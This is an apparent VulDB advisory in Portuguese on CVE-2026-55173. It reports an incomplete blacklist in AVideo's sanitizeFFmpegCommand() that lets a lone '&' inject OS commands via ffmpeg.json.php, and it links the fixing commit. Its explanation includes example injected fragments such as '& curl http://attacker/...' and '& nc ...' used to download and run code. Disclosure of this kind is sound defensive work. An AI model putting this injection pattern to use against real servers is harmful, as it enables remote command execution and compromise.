CVE-2026-55173 in AVideo
Sumário
de VulDB • 17/07/2026
O WWBN AVideo é uma plataforma de vídeo open source. As versões 29.0 e anteriores permanecem vulneráveis a injeção de comando OS porque a correção para CVE-2026-33482 foi incompleta e ainda não neutraliza um único & (o operador de segundo plano do shell). O CVE-2026-33482 relatou que sanitizeFFmpegCommand() (plugin/API/standAlone/functions.php) falhou ao remover a substituição de comando $(...), permitindo injeção de comando OS no sink execAsync() sh -c. A correção (commit 25c8ab90) adicionou $, (, ), {, }, \n, \r à classe de caracteres da lista negra e um str_replace('&&', '', ...), mas não considerou o & único. ffmpeg.json.php constrói o comando a partir de _decryptString(getInput('codeToExecEncrypted')). Este é o mesmo modelo de ameaça aceito pela advisory original ("um atacante que pode criar uma payload criptografada válida pode alcançar execução arbitrária de comandos no servidor standalone encoder") e as mesmas bases CVSS (AV:N/AC:H/PR:N). Múltiplos & separados podem ser encadeados (por exemplo, download + execute). Payloads baseados em redirecionamento são bloqueados pela remoção do >, mas a execução de comando (por exemplo, & curl http://attacker/..., & nc ..., dropping/executando um arquivo) não é. Este problema foi corrigido por este commit: https://github.com/WWBN/AVideo/commit/c1cfa2bea8a351a1d07f5758f82887403e3abf1f.
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.